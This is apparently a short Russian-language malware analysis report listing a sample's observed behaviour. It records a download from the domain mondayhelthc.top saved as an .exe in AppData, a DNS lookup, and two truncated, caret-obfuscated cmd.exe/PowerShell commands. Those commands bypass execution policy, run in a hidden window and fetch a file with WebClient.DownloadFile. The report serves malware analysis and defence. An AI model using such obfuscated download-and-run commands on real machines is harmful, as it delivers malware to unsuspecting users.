Техническая информация
- http://mondayhelthc.top/read.php?f=404 как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "Po^w^ERsh^e^lL.E^xE^ -E^xeCUTiO^npo^liCY b^Y^pasS -N^OPROfI^l^e^ -WIN^D^Ow^S^T^yLE^ hi^d^DeN (neW-ob^ject^ ^S^ysT^eM.^N^E^T^.we^bCl^ieNT^).doW^nLOA^DF^i^Le(^'http://mondayhe...
- DNS ASK mo####helthc.top
- '<SYSTEM32>\cmd.exe' /C "Po^w^ERsh^e^lL.E^xE^ -E^xeCUTiO^npo^liCY b^Y^pasS -N^OPROfI^l^e^ -WIN^D^Ow^S^T^yLE^ hi^d^DeN (neW-ob^ject^ ^S^ysT^eM.^N^E^T^.we^bCl^ieNT^).doW^nLOA^DF^i^Le(^'http://mondayhe...' (со скрытым окном)